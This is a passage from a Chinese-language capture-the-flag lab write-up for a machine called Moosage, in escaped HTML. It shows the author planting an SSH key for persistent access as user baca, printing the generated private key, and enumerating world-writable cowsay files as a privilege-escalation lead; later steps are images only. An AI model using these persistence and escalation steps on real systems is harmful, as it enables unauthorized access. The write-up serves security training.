u53d1\u73b0\u5229\u7528\u70b9\u5c45\u7136\u9700\u8981ssh<\/code>\u8fdb\u884c\u767b\u5f55\u3002\u3002\u3002<\/p>\nSSH cowsay\u914d\u7f6e\u6587\u4ef6\u52ab\u6301<\/h3>\n
\u5148\u751f\u6210\u4e00\u4e2a\u79c1\u94a5\uff1a<\/p>\n
(remote) baca@moosage:\/tmp$ cd ~\n(remote) baca@moosage:\/home\/baca$ ls -la\ntotal 36\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-r--r-- 1 baca baca 220 Apr 22 2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22 2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22 2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .local\n-rw-r--r-- 1 baca baca 807 Apr 22 2021 .profile\n-rw------- 1 baca baca 13 Apr 22 2021 user.txt\n-rw------- 1 baca baca 53 Apr 22 2021 .Xauthority\n(remote) baca@moosage:\/home\/baca$ mkdir .ssh\n(remote) baca@moosage:\/home\/baca$ cd .ssh\n(remote) baca@moosage:\/home\/baca\/.ssh$ ssh-keygen -o\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/baca\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/baca\/.ssh\/id_rsa.\nYour public key has been saved in \/home\/baca\/.ssh\/id_rsa.pub.\nThe key fingerprint is:\nSHA256:pZJRKfzVdSbn1S\/q69LV6jI0uqyA6q\/QBGAdMKHK+hI baca@moosage\nThe key's randomart image is:\n+---[RSA 2048]----+\n|.=+... .. . .o *|\n|+ .. o.. . . *o|\n|o .o .. o|\n|o. o.o . .|\n|... o S . o |\n|Eo . . + . .|\n|o.. . . = o . |\n|.o . . .o = . |\n| o=o. ..o+o=. |\n+----[SHA256]-----+\n(remote) baca@moosage:\/home\/baca\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA3k2MP0wQn7tzLdpT87olkrgzzCgB4UuUjN\/w7U41VimPJxxNdpJi\nZOw1cE34NkJQW+5yDVVmM4JckQFvcVuJ0posXVU1mLczE7LIF6ghnDYq7frUVb0vBEnMl8\n08YD20lZHZEQiYyX6ZewUIzblJmz3SmUrKeF9hTQYZ9dNPtU9pfBGDlN2uu3zIBj4y\/\/XU\nmBEihqpsqGg5KsqydbmHHv1B9TKP3Zp2RO4bj3ahAJ4PXlxDCqVqlSXwnmprnMVbUtfLw6\nUXf2p3HbKx253Vwd\/587J70tS+JE7IgIuVJRAsAg+YoDxrUYPA2rVEeOPceZIXQkGH7Eui\n04Y\/VXzvFQAAA8jHrPPNx6zzzQAAAAdzc2gtcnNhAAABAQDeTYw\/TBCfu3Mt2lPzuiWSuD\nPMKAHhS5SM3\/DtTjVWKY8nHE12kmJk7DVwTfg2QlBb7nINVWYzglyRAW9xW4nSmixdVTWY\ntzMTssgXqCGcNirt+tRVvS8EScyXzTxgPbSVkdkRCJjJfpl7BQjNuUmbPdKZSsp4X2FNBh\nn100+1T2l8EYOU3a67fMgGPjL\/9dSYESKGqmyoaDkqyrJ1uYce\/UH1Mo\/dmnZE7huPdqEA\nng9eXEMKpWqVJfCeamucxVtS18vDpRd\/ancdsrHbndXB3\/nzsnvS1L4kTsiAi5UlECwCD5\nigPGtRg8DatUR449x5khdCQYfsS6LThj9VfO8VAAAAAwEAAQAAAQEAgD+65pWKjayGEXEA\nt\/6vSIrujxyRoRmKdQ+JHk7dZH0LcmPYqMxg6ZqAZe8FgMAXPkI9GEYpdRQDNUDfu0U1KQ\nP7DklnZ1hhpj6hQ0yjP0zczXjE4UYIhu\/Qkc88wsU2loeS9EnCY5SfFSLdZlo8BczP39IP\nJwzXxKj9dx3WwWEguzVLzCtS3WQEIVS37oKDu1MgWN4ZJoCeN+5ciiOP5DBUfI7IPbYIPg\nJqEJjq7fohkH1fe3XIUM9e8bt+gSDsd051EU1kccm7fsuRH7Ze1lEBcPtlANJwoJ+7VxGX\nP2PGoEVEthm58gNdOG7p+PMbmVmylXkvVwrnpq\/f0qQpAQAAAIArsg0i+ISVd2ubLa7PAA\n\/D\/C+SZeb24OdA2evT02RHR0pBltJ9OzPWMPMmVXoanvH10VV0E8bslbhC64TW7Gqsk0yc\nFXwId4+RsdzawHQSRZvur0RnzB0\/WJL0IR20hPr7yX7VF8\/dyjDrdr03Q9pjsmlFSJ\/uxA\njlWep3xLyOzQAAAIEA9WUB10a1I9hD9PJ0agVNv+CAA5ta7JJPMu8xtdt\/rKINqAyAbW1x\newjHwMdcHPUqVT18YXzhpQxqlawj1aiAamSmt0+6XKgH7DB\/vEJ\/Z\/2dhCatO6VP5BVUC\/\ncTs+GnrHA1scYaKN3cAltuMDPeHPcl68BA9pGyVlnthUizaNUAAACBAOfpD0l+qgIY+FCb\nYf4YWAU9a9eyRsXGXZFbZX9wfxQkyovhZtt4IKdNi+kUCf+BbWf63rrvD3b5ct\/s+J4Wq1\nHLAsH\/q+JhzPxVy4xgeGqwIYBNdVX6gs3PP+GB3zATkKZFkH+zu7UlOCbZ7NrCPFaCqg5i\nl\/xygU\/EtYiLao1BAAAADGJhY2FAbW9vc2FnZQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----\n(remote) baca@moosage:\/home\/baca\/.ssh$ mv id_rsa.pub authorized_keys\n(remote) baca@moosage:\/home\/baca\/.ssh$ ls -la\ntotal 16\ndrwxrwxrwx 2 baca baca 4096 Jun 16 12:10 .\ndrwxr-xr-x 4 baca baca 4096 Jun 16 12:09 ..\n-rw-r--r-- 1 baca baca 394 Jun 16 12:09 authorized_keys\n-rw------- 1 baca baca 1823 Jun 16 12:09 id_rsa<\/code><\/pre>\n\u8fdb\u884cssh<\/code>\u767b\u5f55\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ vim baca\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ chmod 600 baca \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ ssh baca@$IP -i baca\nbaca@192.168.10.106: Permission denied (publickey).<\/code><\/pre>\n\u53d1\u73b0\u53ef\u80fd\u662f\u6743\u9650\u914d\u7f6e\u95ee\u9898\uff1a<\/p>\n
(remote) baca@moosage:\/home\/baca$ ls -la\ntotal 40\ndrwxr-xr-x 4 baca baca 4096 Jun 16 12:09 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-r--r-- 1 baca baca 220 Apr 22 2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22 2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22 2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .local\n-rw-r--r-- 1 baca baca 807 Apr 22 2021 .profile\ndrwxrwxrwx 2 baca baca 4096 Jun 16 12:10 .ssh\n-rw------- 1 baca baca 13 Apr 22 2021 user.txt\n-rw------- 1 baca baca 53 Apr 22 2021 .Xauthority\n(remote) baca@moosage:\/home\/baca$ chmod 700 .ssh<\/code><\/pre>\n\u7136\u540e\u5c31\u53ef\u4ee5ssh\u767b\u5f55\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u4e00\u4e0b\u8fd9\u4e2acowsay<\/code>\uff1a\uff08\u4e0d\u8981\u95ee\u6211\u4e3a\u5565\u662fcowsay\uff0c\u56e0\u4e3a\u7528\u8fc7\uff0c\u4e5f\u53ef\u4ee5\u95eeai\u6216\u8005google\uff09<\/p>\nbaca@moosage:~$ find \/ -name "*cowsay*" 2>\/dev\/null\n\/var\/lib\/dpkg\/info\/cowsay.list\n\/var\/lib\/dpkg\/info\/cowsay.md5sums\n\/var\/cache\/apt\/archives\/cowsay_3.03+dfsg2-6_all.deb\n\/usr\/share\/doc\/cowsay\n\/usr\/share\/doc\/cowsay\/examples\/cowsay_random\n\/usr\/share\/cowsay\n\/usr\/share\/bash-completion\/completions\/cowsay\n\/usr\/share\/man\/man6\/cowsay.6.gz\n\/usr\/games\/cowsay\nbaca@moosage:~$ whereis cowsay\ncowsay: \/usr\/games\/cowsay \/usr\/share\/cowsay \/usr\/share\/man\/man6\/cowsay.6.gz\nbaca@moosage:~$ ls -la \/usr\/games\/cowsay\n-rwxr-xr-x 1 root root 4664 Feb 3 2019 \/usr\/games\/cowsay\nbaca@moosage:~$ ls -la \/usr\/share\/cowsay\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 .\ndrwxr-xr-x 98 root root 4096 Apr 22 2021 ..\ndrwxr-xr-x 2 root root 4096 Apr 22 2021 cows\nbaca@moosage:~$ ls -la \/usr\/share\/cowsay\/cows\ntotal 192\ndrwxr-xr-x 2 root root 4096 Apr 22 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-rw-rw- 1 root root 115 Feb 3 2019 apt.cow\n-rw-rw-rw- 1 root root 310 Aug 14 1999 bud-frogs.cow\n-rw-rw-rw- 1 root root 123 Aug 14 1999 bunny.cow\n-rw-rw-rw- 1 root root 1127 Feb 3 2019 calvin.cow\n-rw-rw-rw- 1 root root 480 Aug 14 1999 cheese.cow\n-rw-rw-rw- 1 root root 181 Feb 3 2019 cock.cow\n-rw-rw-rw- 1 root root 230 Aug 14 1999 cower.cow\n-rw-rw-rw- 1 root root 569 Aug 14 1999 daemon.cow\n-rw-rw-rw- 1 root root 175 Aug 14 1999 default.cow\n-rw-rw-rw- 1 root root 1284 Nov 3 1999 dragon-and-cow.cow\n-rw-rw-rw- 1 root root 1000 Aug 14 1999 dragon.cow\n-rw-rw-rw- 1 root root 132 Feb 3 2019 duck.cow\n-rw-rw-rw- 1 root root 284 Aug 14 1999 elephant.cow\n-rw-rw-rw- 1 root root 357 Feb 3 2019 elephant-in-snake.cow\n-rw-rw-rw- 1 root root 585 Aug 14 1999 eyes.cow\n-rw-rw-rw- 1 root root 490 Aug 14 1999 flaming-sheep.cow\n-rw-rw-rw- 1 root root 1018 Aug 14 1999 ghostbusters.cow\n-rw-rw-rw- 1 root root 1054 Feb 3 2019 gnu.cow\n-rw-rw-rw- 1 root root 126 Aug 14 1999 hellokitty.cow\n-rw-rw-rw- 1 root root 687 Feb 3 2019 kangaroo.cow\n-rw-rw-rw- 1 root root 637 Aug 14 1999 kiss.cow\n-rw-rw-rw- 1 root root 162 Aug 14 1999 koala.cow\n-rw-rw-rw- 1 root root 406 Aug 14 1999 kosh.cow\n-rw-rw-rw- 1 root root 226 Feb 3 2019 luke-koala.cow\n-rw-rw-rw- 1 root root 814 Feb 3 2019 mech-and-cow.cow\n-rw-rw-rw- 1 root root 439 Aug 14 1999 milk.cow\n-rw-rw-rw- 1 root root 249 Feb 3 2019 moofasa.cow\n-rw-rw-rw- 1 root root 203 Aug 14 1999 moose.cow\n-rw-rw-rw- 1 root root 1623 Feb 3 2019 pony.cow\n-rw-rw-rw- 1 root root 305 Feb 3 2019 pony-smaller.cow\n-rw-rw-rw- 1 root root 252 Aug 14 1999 ren.cow\n-rw-rw-rw- 1 root root 234 Aug 14 1999 sheep.cow\n-rw-rw-rw- 1 root root 433 Aug 14 1999 skeleton.cow\n-rw-rw-rw- 1 root root 283 Feb 3 2019 snowman.cow\n-rw-rw-rw- 1 root root 854 Aug 14 1999 stegosaurus.cow\n-rw-rw-rw- 1 root root 364 Aug 14 1999 stimpy.cow\n-rw-rw-rw- 1 root root 229 Feb 3 2019 suse.cow\n-rw-rw-rw- 1 root root 293 Aug 14 1999 three-eyes.cow\n-rw-rw-rw- 1 root root 1302 Aug 14 1999 turkey.cow\n-rw-rw-rw- 1 root root 1105 Aug 14 1999 turtle.cow\n-rw-rw-rw- 1 root root 215 Nov 12 1999 tux.cow\n-rw-rw-rw- 1 root root 1718 Feb 3 2019 unipony.cow\n-rw-rw-rw- 1 root root 365 Feb 3 2019 unipony-smaller.cow\n-rw-rw-rw- 1 root root 279 Aug 14 1999 vader.cow\n-rw-rw-rw- 1 root root 213 Aug 14 1999 vader-koala.cow\n-rw-rw-rw- 1 root root 248 Aug 14 1999 www.cow<\/code><\/pre>\n
![\"image-20250616221408401\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040120.png\")
<\/div>![\"image-20250616223648669\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040121.png\")
<\/div><\/p>\n![\"image-20250616221646089\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040122.png\")
<\/div><\/p>\n![\"image-20250616223715722\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040123.png\")
<\/div><\/p>\n![\"image-20250616223834176\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040124.png\")
<\/div><\/p>\n![\"image-20250616223942077\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040125.png\")
<\/div><\/p>\n![\"image-20250616224141732\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040126.png\")
<\/div><\/p>\n![\"image-20250616224522215\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040127.png\")
<\/div><\/p>\n![\"image-20250616225746430\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040128.png\")
<\/div><\/p>\n![\"image-20250616230421792\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040129.png\")
<\/div><\/p>\n![\"image-20250616232243158\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040130.png\")
<\/div><\/p>\n![\"image-20250616232553033\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040132.png\")
<\/div><\/p>\n![\"image-20250616233250326\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040133.png\")
<\/div><\/p>\n![\"image-20250616233346915\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040134.png\")
<\/div><\/p>\n![\"image-20250616233944682\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040135.png\")
<\/div><\/p>\n![\"image-20250617001303253\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040136.png\")
<\/div><\/p>\n![\"image-20250617001943737\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040137.png\")
<\/div><\/p>\n![\"image-20250617002322052\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040138.png\")
<\/div><\/p>\n![\"image-20250617002336361\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040139.png\")
<\/div><\/p>\n